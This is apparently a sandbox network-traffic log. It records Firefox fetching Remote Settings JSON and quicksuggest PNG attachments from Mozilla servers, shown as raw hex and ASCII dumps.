2024-07-26 18:11:03 UTC	881	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:03 UTC	58	IN	Data Raw: 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: "https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.5	64253	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	334	OUT	GET /main-workspace/quicksuggest/dff96728-c23d-4f24-91c7-9233d01352d4 HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	690	IN	HTTP/1.1 200 OK x-goog-generation: 1721840736038546 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 15000 x-goog-hash: crc32c=8ZsLiA== x-goog-hash: md5=HCK3/NTaH9MZ7VZTXJTGiQ== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 15000 X-GUploader-UploadID: AHxI1nPCXSMYTKSanixDCfxZ36669CtP1JiIpNOK-wbj6Oevfl9-mwMgrXJyjaVqM692atzuAlnnvZpTtw Server: UploadServer Date: Wed, 24 Jul 2024 17:30:08 GMT Cache-Control: public,max-age=604800 Last-Modified: Wed, 24 Jul 2024 17:05:36 GMT ETag: "1c22b7fcd4da1fd319ed56535c94c689" Content-Type: application/octet-stream Age: 175255 Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	700	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 06 95 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 36 20 37 39 2e 31 36 34 37 35 33 2c 20 32 30 32 31 2f 30 32 2f 31 35 2d 31 31 3a 35 32 3a 31 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 Data Ascii: PNGIHDR>apHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RD
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 22 32 30 32 32 2d 30 36 2d 30 31 54 31 30 3a 34 36 3a 35 32 2d 30 34 3a 30 30 22 20 78 6d 70 3a 4d 65 74 61 64 61 74 61 44 61 74 65 3d 22 32 30 32 32 2d 30 36 2d 30 31 54 31 30 3a 34 36 3a 35 32 2d 30 34 3a 30 30 22 20 64 63 3a 66 6f 72 6d 61 74 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 70 68 6f 74 6f 73 68 6f 70 3a 43 6f 6c 6f 72 4d 6f 64 65 3d 22 33 22 20 70 68 6f 74 6f 73 68 6f 70 3a 49 43 43 50 72 6f 66 69 6c 65 3d 22 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 65 34 33 62 65 38 35 35 2d 36 34 61 65 2d 34 33 34 30 2d 38 35 39 38 2d 36 62 30 36 36 61 31 33 36 61 39 35 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 Data Ascii: "2022-06-01T10:46:52-04:00" xmp:MetadataDate="2022-06-01T10:46:52-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:e43be855-64ae-4340-8598-6b066a136a95" xmpMM:DocumentID="adobe:docid:p
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 21 b2 42 c8 48 04 b2 42 68 d7 81 68 1c 2c 1b eb e8 c3 11 55 95 10 8b ed c0 0f a4 01 f1 a1 25 2c 40 48 1b b7 bb 07 d1 df 83 b5 e7 9e c3 ca 0d 23 c0 ff 24 b4 06 29 11 91 30 a2 a8 08 e5 3a e8 f6 0e bf 6a 6d 9d aa 7a fb f7 d4 d1 e8 14 dd dd 5d a3 e2 89 72 fa a3 05 3c ff 52 36 42 84 74 22 61 89 b9 f3 14 96 1d c7 73 fb dd 05 8b bb 45 20 d0 44 28 54 2b 0b 0b d6 58 e3 6b 56 88 82 82 e5 22 27 12 95 25 c5 68 d7 05 9f 0d bb a6 5b 6c 86 ff de f8 1f 05 ff bb 04 d0 1a 84 40 e4 e6 20 22 11 54 4b 0b aa a9 79 5f ef bd 15 c7 a9 fa fa a3 54 63 f3 0c dd dd 53 a6 e3 71 70 5c b0 d2 b3 9d ed 03 a5 cc df 7e 3f b8 0e 78 1e d8 3e f4 da 75 a6 47 6b 8d 90 16 04 fc c8 e2 a2 0e 91 9f bb c8 ae a9 79 43 8c a9 78 c5 3e 70 fa 3c 51 52 82 76 0d e9 32 75 fd 8f e2 7f 8f 00 4a 81 6d 23 c7 54 Data Ascii: !BHBhh,U%,@H#$)0:jmz]r<R6Bt"asE D(T+XkV"'%h[l@ "TKy_TcSqp\~?x>uGkyCx>p<QRv2uJm#T
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: ce 45 e4 e6 a5 15 3f 3e d4 a6 0d 08 9f 4d e4 1f 7f 23 70 ce 59 43 2e 55 9b 6a 89 df f1 7b 92 0f 3f 8a d7 b0 1e 00 99 53 86 88 44 4c 43 7f 9c 77 11 e6 3a 1d 8b a3 ba 5a 01 07 99 57 82 ff b3 a7 11 ba f2 72 ec 19 07 0e 29 ee 2e 5a 42 df d9 e7 e1 6e 58 83 55 bd 07 78 ae a9 c3 71 70 5b 36 12 f9 ed 5d ff 17 ba fa 6b f7 78 6b d6 ed 54 02 20 25 22 e5 80 d0 58 7b 4c 19 76 7a 38 01 56 ae 36 92 b5 bd 13 75 de 1a 44 4e 36 c2 b6 e9 39 e9 f4 35 ce bb 73 27 59 35 53 c0 75 4d e3 d7 6e 40 84 43 e4 ce 79 05 fb c0 e9 43 2e 8d dd f8 33 e2 b7 fd 0e af a7 15 2b 54 80 28 4c 2b 82 76 28 81 05 48 81 ee ed c5 eb 69 46 8a 20 c1 ff fb 22 e1 5b 6e 42 14 e4 0f be 46 57 37 3d 47 1d 87 b3 6c e1 20 09 a4 44 77 74 80 f2 c8 7d f5 b9 52 39 69 62 ab 6e 6a de 79 02 61 7a c9 8a df 87 35 71 f8 Data Ascii: E?>M#pYC.Uj{?SDLCw:ZWr).ZBnXUxqp[6]kxkT %"X{Lvz8V6uDN695s'Y5SuMn@CyC.3+T(L+v(HiF "[nBFW7=Gl Dwt}R9ibnjyaz5q
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 70 6b e9 47 73 08 91 12 fc 7e 44 56 08 6c 1b 77 cd 5a 64 79 29 b2 a2 02 dd d6 01 96 6d da de f3 8c a7 cd 76 28 3a a4 df 8f c8 c9 ad 17 ca 1a f4 f4 0d 87 f1 36 6c 42 6d dc 84 4c 1b 5f 7c 87 ce 32 17 28 bd f3 34 94 1f 05 96 85 26 85 7d e0 01 43 0e 7b 2b 57 23 c4 e0 4a 06 ad 11 39 39 f5 c4 63 a8 de ae ed 9b 39 3d 65 1a df f3 c0 ef 47 d5 37 a1 1a 1b 90 e3 c7 62 15 15 19 6b a9 25 33 32 db c0 7d b6 47 41 f6 89 3c 82 44 56 28 6d 70 b1 d0 2d 6d e8 70 08 12 71 84 3f 68 d8 99 4c a2 95 fe ef 3c 90 02 51 5a bc 54 84 02 e6 45 6d 0b 11 0a e2 35 ac c3 79 eb 6d 02 03 04 38 e1 58 ec 49 fb e2 ad 5b 8d ac ac d9 bd 04 41 21 d0 7d fd 48 fc 04 be 74 51 e6 b0 b7 61 23 ee 82 85 c8 82 a2 4c 39 5c 17 51 5a b2 5c 94 14 22 f5 87 bd 83 36 96 d9 60 00 ad 34 ba a3 13 21 25 ba a2 0c 99 Data Ascii: pkGs~DVlwZdy)mv(:6lBmL_\|2(4&}C{+W#J99c9=eG7bk%32}GA<DV(mp-mpq?hL<QZTEm5ym8XI[A!}HtQa#L9\QZ\"6`4!%
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 35 36 46 64 79 79 86 04 76 c5 44 92 8f 3d 8c 33 e7 75 22 bf f9 15 81 2f 0c ae b9 7d 47 1c 81 ef 88 23 d0 d1 7e 9c d7 e7 e2 bc fc 2a ce dc 79 78 6b 3f c0 6b aa 05 06 96 4e 02 b0 10 d8 0c 78 05 6b 5c 8c be 5e a7 4b d8 88 ec 7c ec 69 fb 60 1f 72 10 fe a3 8f c2 3e fa 08 64 7e 3e 5b 22 f5 c4 93 44 af bb 01 67 c3 6a ac e2 1a 13 3e 36 d0 f8 0d 0d 80 47 ee dc d9 07 5b 93 26 76 a9 c6 06 dc 79 ef a2 ba bb 11 f9 79 08 29 8d bd 23 16 df 65 ab 99 5d 17 1a 36 90 d4 c1 ef 07 9f 8d f7 de 0a 64 6e 0e ee db ef e2 3b f2 b0 fe ac 9b 6e 3c b8 ff cb 5f 59 a0 5b 5a 83 a2 ac d4 68 c1 a4 c0 aa de 03 d5 d4 40 ef 17 2f 26 f0 f8 93 64 5d ff ad 21 ae 4e 22 1c c1 7f f2 89 f8 4f 36 a6 64 6f d5 6a bc 35 6b f1 d6 6f 44 d5 37 a2 5a 5b 8d 15 2e 91 30 da 4a cb 42 04 83 88 ec 08 b2 a4 18 59 Data Ascii: 56FdyyvD=3u"/}G#~*yxk?kNxk\^K\|i`r>d~>["Dgj>6G[&vyy)#e]6dn;n<_Y[Zh@/&d]!N"O6doj5koD7Z[.0JBY
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 34 9a 42 db 97 1e 25 e4 16 04 11 66 75 12 4c 5b 12 5d 0f 77 e5 aa e9 ee b2 e5 d3 65 55 e5 8f 7c 33 0e f8 9d ef 88 43 7e 2d c7 8d 8b 7a 2d 6d 1f db 3c 3e 3c 32 68 5b 1e 41 ad ad a8 55 1f 20 fc 3e 44 69 29 ce 9b 6f 5d 90 fa d7 63 3f 77 56 bf 3f 4e 86 f2 8c fa 12 86 f6 14 21 4c 03 f7 f7 a3 fb bb d1 a4 d2 0d 10 32 86 8f ec 88 99 13 6d db a4 67 f3 3c 13 ba 1d 8d 9a f9 d8 e9 07 0c c3 85 9d 6d 14 26 99 d8 fd 0f e9 91 e9 10 6d 9d 4c 99 91 64 c0 59 e5 bf 49 d9 03 cf ee ba e8 94 83 08 06 3e 82 4a 56 a0 53 26 d5 8c 76 7a 01 8d 40 82 1d 46 e6 e7 99 f7 dc 3c e7 90 eb a2 63 71 f3 6d 7a 7a d0 c4 d3 b5 f8 11 e1 5c 33 e5 6d 79 ef 81 80 d5 be 7e 74 22 81 35 a6 bc c9 7f da 49 3f f6 1d 76 e8 5f 74 38 8c 70 1d 74 6f 14 6b ff a9 58 15 65 66 44 db 7c aa c8 c9 65 4b 6c 1f 01 3a Data Ascii: 4B%fuL[]weU\|3C~-z-m<><2h[AU >Di)o]c?wV?N!L2mg<m&mLdYI>JVS&vz@F<cqmzz\3my~t"5I?v_t8ptokXefD\|eKl:
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 91 75 c3 f5 64 fd e4 47 43 97 a6 69 b8 0b 17 e1 bc 3a 07 67 de 3b 78 cb 57 e0 d5 d5 a3 53 bd 43 de c5 2c 39 65 fa c8 c0 32 74 e0 bc 85 8c e4 23 c7 8d c5 9e b6 0f be c3 0e c1 77 dc 31 58 13 26 0c ff ae 2b 57 11 fd ce f7 49 3c fd 38 56 a4 d8 74 4a 37 9d 8c 22 16 43 75 d4 13 fe de 4f 7e 98 f5 f3 1f ff 4c f7 f7 9b 7c 48 42 20 f2 b6 67 04 a8 ab 03 cf c3 1a 3b 16 67 f6 9c 69 3d c7 9e b0 44 64 e5 18 13 67 3a a9 b2 6a 6e 42 27 bb 09 ff f8 46 b2 7e f2 c3 61 95 a6 9e 7c 8a c4 03 0f e1 cc 7e 1d d5 d5 64 6e e4 cf 33 3a 01 bf 6f fb 97 76 3a 2d 2c 45 a3 a8 58 17 e0 21 ec 6c 7c b3 66 10 f8 c2 85 04 2f f9 d2 b0 ba dc 25 4b e9 ff c2 25 a4 96 2f c2 ae 9c 6c 3e 70 3a 4b 86 57 bb 9a c0 89 a7 bf 92 fd fc 93 c7 6f d9 77 a3 57 5c fb fb e8 5d b7 7f dd 1e 33 69 b0 63 4b 89 57 bb Data Ascii: udGCi:g;xWSC,9e2t#w1X&+WI<8VtJ7"CuO~L\|HB g;gi=Ddg:jnB'F~a\|~dn3:ov:-,EX!l\|f/%K%/l>p:KWowW\]3icKW
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 2d 67 a0 7b fb 91 d9 45 84 be ff ad c1 6a 1b 1a e9 fb f2 ff 21 83 79 bb 47 e3 43 3a be b0 0c 81 4d ef 79 17 1b c7 d7 34 42 3f f8 0e 5a 25 07 a7 a5 80 1f dd d7 8b f3 9f 37 cf df 5a 55 c3 08 e0 2d 5b 76 14 da c9 2c af 74 34 8e 8c 14 11 f8 fc 79 99 32 c9 7f 3c 4c 6a e1 5c ac 31 93 77 9f 5c 3d 60 e6 f8 74 24 4e ec 67 37 0f 39 15 f8 fc b9 e8 44 f7 90 39 dd e8 e6 65 c6 51 55 75 37 e2 3f f5 54 64 69 69 a6 4c ec a7 37 a1 92 7d c8 d2 b2 dd a3 f1 07 e0 ba c8 aa 89 b8 75 6b 49 dc 71 57 e6 b0 ff b3 a7 62 4f de cf 24 a7 84 8c 2e c3 db b0 f1 d0 ad 55 33 9c 00 0d 4d fb 08 5f 28 c3 20 dd d9 8e 7d d0 4c 64 75 65 a6 4c e2 de fb 8c a5 4b ee 86 71 fa 9e 8b 8c 94 e2 fc 67 1e ba a3 33 73 d8 77 cc 91 08 11 dc f6 68 a5 00 34 be 63 8f cc 1c d2 3d 3d a4 9e 7e 1e 2b 54 b8 7b 8c 72 Data Ascii: -g{Ej!yGC:My4B?Z%7ZU-[v,t4y2<Lj\1w\=`t$Ng79D9eQUu7?TdiiL7}ukIqWbO$.U3M_( }LdueLKqg3swh4c==~+T{r
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 8a 8b c8 5f f4 2e c1 33 ce c6 6d 5a 8f 6a 6a 32 4e af 3b eb 5d 11 78 b5 6b 51 9d 0d 84 af bb 9e 9c 67 9f 1c 52 a4 ff b2 2b 71 de 5b 88 ac 9a 38 e8 1e d6 d6 82 55 36 36 15 b8 e0 ec 9b 55 32 b1 d5 aa 87 d3 d8 b2 90 95 95 84 ae bd fa 62 ad e3 a6 c7 8b b4 7d b9 62 22 89 c7 1e 22 7a f9 95 43 2e c9 fa f9 ff 23 ef e5 57 f1 4d 9f 81 d7 b0 16 af 7e c3 a7 97 c1 4b 98 8c 98 aa be 1e b7 6e 35 b2 a4 90 ec bb fe 48 ce d3 4f 0e 49 d4 e4 2e 58 48 cf 49 a7 20 fc 39 43 d3 b5 34 ac c5 b7 ff ac 95 a1 ef 7c eb 6e d5 d0 88 7d da a9 af 07 ce 3c ff 59 b7 65 83 19 de d3 ce b0 32 5c 48 ef 17 2f 26 f5 ca ec c1 7b 07 03 e4 3c f1 2f 72 fe f8 27 64 71 01 6e dd 6a 93 04 42 f3 e9 10 41 9a 9c 80 5e fd 7a f3 dc d3 67 90 f7 c2 cb 84 6f 1d ea f7 10 fb f1 4f 89 ff f9 f7 d8 a5 63 41 a7 33 b4 Data Ascii: _.3mZjj2N;]xkQgR+q[8U66U2b}b""zC.#WM~Kn5HOI.XHI 9C4\|n}<Ye2\H/&{</r'dqnjBA^zgoOcA3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.5	64252	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	334	OUT	GET /main-workspace/quicksuggest/7b0c093e-1c31-409b-a323-78ca82e5f600 HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	732	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AHxI1nODSkpETI8Q1rnUKXoLO463NYnWJz7KUUNp2czDPtBOelGFMfUJLkrxYFtKqK0_gxXcRy8 x-goog-generation: 1678716180853467 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 15693 x-goog-meta-goog-reserved-file-mtime: 1654282197 x-goog-hash: crc32c=Nz4VIA== x-goog-hash: md5=SI31xyG/nWGefRpCfU+A4w== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 15693 Server: UploadServer Date: Fri, 26 Jul 2024 03:41:50 GMT Cache-Control: public,max-age=604800 Age: 52153 Last-Modified: Mon, 13 Mar 2023 14:03:00 GMT ETag: "488df5c721bf9d619e7d1a427d4f80e3" Content-Type: application/octet-stream Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	658	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 3d 14 49 44 41 54 78 da ed 5d 05 58 54 5b d7 9e 22 45 b1 af 62 21 82 82 b4 74 77 77 49 a7 34 08 12 82 b4 84 dd dd dd dd 1d 08 26 8a 08 d2 dd dd dd f8 af 33 67 66 18 40 bc 06 78 fd ee 7f cf 73 9e 79 0e 03 cc 9c b3 de 15 ef 5a 7b ef b5 31 98 7f f4 c0 8e 38 c7 e0 23 be 79 8e c1 37 fe 9b 8e df 0d 00 e6 3f 00 7e 19 00 2c f1 a0 fe f1 ab 7f 33 8e 90 ff 67 01 c3 30 f8 dd 36 f7 ef 86 e1 df f4 5d ff 2a 00 be 47 eb b1 54 c7 7f 00 8c 35 48 58 0c b5 54 d1 1f 71 38 38 71 23 25 fe d3 0e ea bf e3 7b c1 00 d1 13 08 38 38 69 69 69 69 68 68 00 86 ff c4 32 ea 41 91 0e aa ad c3 94 94 5a 7f f1 78 3c 06 87 70 75 2c 1e 37 c8 dc f1 b8 e9 33 67 70 f3 f2 e8 19 e8 fb fa fb ad df Data Ascii: PNGIHDRL\=IDATx]XT["Eb!twwI4&3gf@xsyZ{18#y7?~,3g06]*GT5HXTq88q#%{88iiiihh2AZx<pu,73gp
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 59 70 0d 60 34 34 35 82 49 9d 3e 7b 46 5b 57 87 99 99 99 72 4b 28 12 14 f5 47 45 ff 6f 70 41 c3 9e 04 15 3a fc 08 17 0c 0c 0c 6a 1a ea d7 6e 5c 6f ef ec 00 c7 02 fe a4 ad a3 1d 84 5e df dc 06 67 6b 67 4f 63 6b 47 61 69 45 c2 c7 e4 5b f7 1e ee 3d 78 64 f3 f6 5d 6b 42 23 56 f9 07 ba 7a 7a bb ad 5c e5 ec be d2 dd cb c7 73 95 df 4a 3f 3f 0f 6f 5f 4f 5f 5f f8 95 4f 60 60 78 d4 ba 4d 3b 76 1c 3b 75 f6 e1 f3 e7 69 59 b9 05 65 65 95 b5 0d a5 d5 d5 79 45 a5 69 59 d9 e9 99 19 60 2b 55 80 53 5d ed fb c4 0f c1 a1 21 dc dc dc a8 f4 29 fa 8e da 25 fc f8 ef 61 53 c3 3c 2f 1d 1d 9d b1 b1 71 62 62 22 c8 bd ff cb 00 22 f7 ba 5a 00 00 10 e8 ee ff 52 5d df f4 f2 ed fb fd 87 8f f9 af 09 01 29 db ae 70 36 32 b5 b0 73 74 71 74 f5 00 b9 7b fb 05 04 04 87 01 12 5e be ab 8f 9f 3e Data Ascii: Yp`445I>{F[WrK(GEopA:jn\o^gkgOckGaiE[=xd]kB#Vzz\sJ??o_O__O``xM;v;uiYeeyEiY`+US]!)%aS</qbb""ZR])p62stqt{^>
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: a4 a9 d3 dc bd bc 41 ee 57 6e dc 04 fd 90 53 52 06 4f 98 53 50 9c 99 5b f0 f8 79 dc eb 37 ef 3e 26 25 df bb ff 50 44 54 9c 6c 43 f8 91 8e 0e f3 fb 4a dc a3 03 80 dc 1a 1e cf c8 34 e1 cc b9 b3 7d a0 f8 5d 9d 8d ad 2d e5 d5 35 e9 d9 39 8e ae 6e ba 86 46 36 0e 2b 6c 57 38 02 ab d1 33 5a ce 34 79 0a 3c 3c fc d3 a0 2c e0 9a 40 3b b2 50 43 5d 3e 23 7d 23 1e e7 b5 ca 1b 00 28 af ae 3a 75 ee e2 ea e0 30 c8 12 40 9d c9 d2 c1 a0 89 1e c5 02 10 00 70 d8 e1 91 9c 02 3c dc 06 16 37 67 01 6b 78 54 f4 a3 67 cf 41 51 cc ac 6c 65 15 55 ae df be 57 51 53 1f 17 ff 0a 4e 30 88 a7 cf 62 75 f5 0c a8 22 fc 1f 00 00 b5 e8 09 38 3c 11 00 9a bb f7 1e 20 6e a7 ab 1b 3c 7e 75 63 e3 bd c7 cf c0 e7 18 2c 37 07 b7 03 24 07 38 3d 3b 27 17 86 80 68 22 9e 28 ee 91 2e 15 0d b3 d4 e5 52 6a Data Ascii: AWnSROSP[y7>&%PDTlCJ4}]-59nF6+lW83Z4y<<,@;PC]>#}#(:u0@p<7gkxTgAQleUWQSN0bu"8< n<~uc,7$8=;'h"(.Rj
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: f4 f4 f4 ef de 27 f4 0c f4 d7 35 35 be 4b 4a ba 74 e3 06 30 4e 23 2b 4b 77 6f 5f 03 13 33 44 f7 b1 34 24 0b 00 89 90 a9 2a e5 a4 d4 7b be 1f 00 4a 56 3c 61 c2 84 27 4f 9e 00 00 6d 6d 6d f9 05 45 57 6f dd 05 00 02 42 c2 21 d5 40 cc 8e 52 91 fe 2a 00 a4 9f 47 05 00 47 9e bf 4e 01 80 34 47 06 e1 a6 08 35 3a 7e fa dc ce 7d 07 25 64 15 0d 4d 2d 6b 5b 3b 4e 5e bc 0c be e8 c0 b1 63 46 a6 66 a4 42 d6 38 0d ea 0e 33 ae 33 67 ce a0 09 57 ec cb 57 af 12 12 25 e5 14 81 f3 b8 79 f9 20 89 22 22 02 24 76 81 26 a2 ce 67 6c 8b 7d 73 e6 cc 49 4f 4f ef ee ee 6e 6c 6c 04 0b b8 75 ff 51 60 44 64 70 54 8c b5 93 8b be 89 39 62 01 38 12 cd 1d 8e e3 4f 25 4b 68 b6 8c 25 b9 35 84 a7 de b8 73 17 92 4a 31 39 05 77 ff d5 b9 e5 15 47 ce 9d 3f 7b f5 fa fe 23 c7 f9 85 44 89 4f 8d fd ea Data Ascii: '55KJt0N#+Kwo_3D4${JV<a'OmmmEWoB!@RGGN4G5:~}%dM-k[;N^cFfB833gWW%y ""$v&gl}sIOOnlluQ`DdpT9b8O%Kh%5sJ19wG?{#DO
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 2d 35 f6 e5 1b 14 00 ff d0 70 5b 17 77 b8 b7 05 8b 16 7f 1d 80 b1 99 83 40 a5 9a 38 e2 ac 3f 2c c1 da c1 d9 da c9 95 83 57 c0 37 34 1c 8c 60 fd ce dd 40 8b 41 44 c4 ea 05 7e 74 39 ff 7d f5 97 74 ac 0e 0c e8 ed ef 6b 68 6a 7c 16 17 0f 71 df c0 dc ca 63 95 1f 04 1f 22 f5 c4 53 d7 60 c7 0f 00 14 e0 d0 d0 50 94 02 01 00 10 03 50 00 d0 20 bc 3a 2c c2 de cd 13 00 e0 13 12 fd 7a 0c 18 53 00 a8 85 08 91 c0 3f 34 82 4f 5c 72 de 12 ae c2 ea da 4d 7b f6 c5 6c dd ee e2 ed c3 ca ce 81 8c 00 a2 a3 d0 df 03 c0 c8 2f c3 21 e5 64 c2 87 8f c8 80 57 52 f2 a7 d4 cc 2c 43 53 0b 0b 07 27 50 3a 8e a5 bc 83 cf f9 75 13 c3 fd c2 c0 c8 d7 e9 e0 9e 3d 7b 00 80 fe fe 7e 14 00 70 41 00 40 60 68 44 44 cc 06 80 61 85 87 17 b8 20 59 25 d5 61 00 fc 0a 0c c4 8c 1a 37 12 0d 02 8e 9a 92 12 Data Ascii: -5p[w@8?,W74`@AD~t9}tkhj\|qc"S`PP :,zS?4O\rM{l/!dWR,CS'P:u={~pA@`hDDa Y%a7
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 22 00 00 5c d0 87 4f 9f c1 02 c2 62 36 87 46 6f 72 f2 f2 33 b4 b4 53 d3 33 b4 b2 77 9c 38 65 3a f5 44 5d ca 52 bd 71 92 3e b9 74 8f 13 91 90 9e bf 68 09 96 81 69 df b1 93 a7 2f 5f 73 f7 5d 6d 64 66 c9 c1 c5 f3 33 00 3c 7d fe ac b5 b3 eb 79 fc cb 17 af df d9 39 b9 ae f4 0d 08 8b 8c 19 b9 0a ee f7 f8 22 49 49 49 e0 a0 d5 d5 d5 a0 fe e0 82 c0 02 6a 6a 6a 52 d3 32 00 80 c0 d0 b5 a0 fe 80 81 e3 4a 5f 5d 53 2b 65 6d 3d 6b 27 97 e9 b3 e6 10 0d 1f 33 64 28 71 1c 62 c0 10 1e 88 c5 73 f2 f0 b3 72 70 e1 18 27 42 56 08 46 00 a9 89 ba 8e be 38 e4 ad 98 c1 ea c8 f7 96 99 d2 33 b2 9a da 3a 1f 3c 79 fe fc e5 5b 2b 7b 27 bf 35 a1 1e de be e3 47 24 86 8e 81 10 a8 a1 05 9b d3 d6 d6 06 ff 53 59 59 09 00 f4 f4 f4 f4 f6 f6 82 35 00 00 c9 69 99 21 6b 63 40 fd 01 03 7b 77 6f 4d Data Ascii: "\Ob6For3S3w8e:D]Rq>thi/_s]mdf3<}y9"IIIjjjR2J_]S+em=k'3d(qbsrp'BVF83:<y[+{'5G$SYY5i!kc@{woM
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: fd c4 57 44 fa ed 1d 5d 20 7a 80 e5 c8 d1 53 e6 56 f6 71 af 12 94 d5 b4 21 1b 68 6e e9 a8 6f 68 02 7a da d5 d5 d5 d6 d6 d2 d5 d9 de d5 0d d7 1d 9d 9d f0 d7 5d d5 b5 55 05 45 85 4f 9e 3d 15 12 11 06 8c a9 06 9e 10 79 60 89 ed 1b 47 5b a4 ff 83 5a 85 71 74 5e 01 aa f0 e8 d9 73 64 f9 54 78 a4 90 b8 94 b4 82 f2 5f b3 58 50 98 51 00 b0 7f 0b 80 8c ac fc c4 49 48 67 b0 cd db 77 1d 3b 7d 7e 4d 58 a4 df 9a f0 45 8b b9 c7 0a 00 f4 09 29 84 07 44 cf c3 c3 73 f1 e2 45 d4 b9 a3 ae 06 32 5e a2 e8 07 d0 7e ad e0 5d 1a 9b 5a 6a 1b 9b 1e 3f 8f d3 35 5a 2e 26 29 27 21 ab 18 fb ea dd c2 c5 4b 67 cd 63 f5 09 08 02 e6 03 7f d0 da d6 d1 d1 05 34 b5 13 ec 00 cd 18 d0 cc 19 